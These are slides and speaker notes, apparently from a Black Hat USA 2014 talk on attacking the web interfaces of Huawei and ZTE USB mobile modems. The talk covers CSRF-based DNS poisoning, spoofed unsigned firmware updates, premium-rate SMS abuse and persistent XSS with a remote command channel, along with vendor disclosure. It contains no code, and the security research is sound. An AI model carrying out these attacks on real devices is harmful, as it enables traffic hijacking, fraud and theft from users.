9. Previous research
• Nikita Tarakanov & Oleg Kupreev
– From China With Love (Black Hat EU 2013)
• Rahul Sasi
– SMS to Meterpreter – Fuzzing USB Modems
(Nullcon Goa 2013)
10. Scope
• Devices from the two biggest vendors*
– Huawei
– ZTE
• Focus on one device from each
– Huawei E3276
– ZTE MF821D
• Identify common attack surface
*Combined market share of more than 80% in 2011 (www.strategyanalytics.com)
11. In a nutshell
• Runs embedded Linux
• Mobile capabilities
– GSM, 3G, 4G, SMS
• Web interface
– Part of carrier branding
• No authentication
– Single-user device
19. DNS poisoning
• CSRF to add a new profile
• Static DNS servers
• Read Only & Set Default
• Remove original profile
• Send user to ad-networks, malware sites,
spoofed websites, etc.
20. DNS poisoning - bonus attack
• Trigger firmware update
• Spoof update server
– Downloads are over HTTP
– No code signing
• Potentially get user to
install backdoored
firmware...
24. CSRF to SMS
• CSRF to make the modem send SMS
– Send to premium rate number
• Potentially identify the user
– Look up phone number
– Twin cards
• Useful in targeted phishing attacks
28. Getting persistent
• The web interface is where you go to
connect to the Internet
– Huawei Hilink opens main page automatically
– ZTE creates a desktop shortcut
• The main page sets everything up
– Loads an iframe for user interaction
– It also loads the chosen language
30. Getting persistent
• Execute code every time the user
connects to the Internet
• Interact with injected code
• Command channel
– Poll remote server (BeEF style)
– Out of band over SMS
33. What to expect
• Attacks on configuration
– Network
– Mobile
• Abuse of functionality
– Outbound & inbound SMS
• Injection attacks
– Getting persistent
– Stealing information
34. Getting it fixed
• ZTE is “working on it”
– I have no details
– ZTE does not seem to have a product security
team
• Huawei is fixing their entire product line
– Nice++
– Huawei has a product security team
• Sounds pretty good though, right?
35. The update model is broken
• Vendors cannot push fixes directly to end-
users
– Branding complicates things
• Vendor -> Carrier -> User
– Carriers might not make the fix available
– Users might not install the fix
• Most existing devices will probably never
get patched
39. Thank you for listening!
Andreas Lindh, @addelindh, Black Hat USA 2014
Editor's Notes
Path of least resistance – attackers love this
By using this logic, we’re going to take a look at some practical attacks that are likely to happen in the real world
Simply because they are not hard to execute and they have great potential for paying off
Popular - Huawei and ZTE own the market
Common attack vectors for this kind of devices
Not about specific vulnerabilities in specific devices (even though examples), more about what type of attacks we can expect as a whole
Like a phone; sim, phone number, etc.
A number of different Denial of Service attacks are possible
Out of scope as they don’t meet our objectives
First thing I did was go looking for a way to change the network configuration
Not very much for the user to fill out
Configuration hidden from the user
SCA = service center address, phone number to the carriers Short Message Service Center
Devices have a number of configuration options – set language, enable or disable roaming, auto connect
Go to certain pages, loaded as content in JavaScript variables
Settings are saved in the device – persistent XSS
Attacks on configuration, especially network but SMS is not out of the question
The SMS functionality is bound to be, and probably already is, abused
Injection attacks for persistence and stealing info from the actual device
Attacks not possible without the web interface
Web is easy – implement, use, but also to attack
Web is hard – hard to secure, terrible track record at securing web, especially in the embedded space
IoT – lot’s of embedded with web interfaces and vulns like these – research, report to vendors, report to public
Don’t forget to research the easy stuff too because that’s where attackers will focus their efforts first
We mustn’t forget researching the easy stuff too because that’s where attackers will focus their efforts first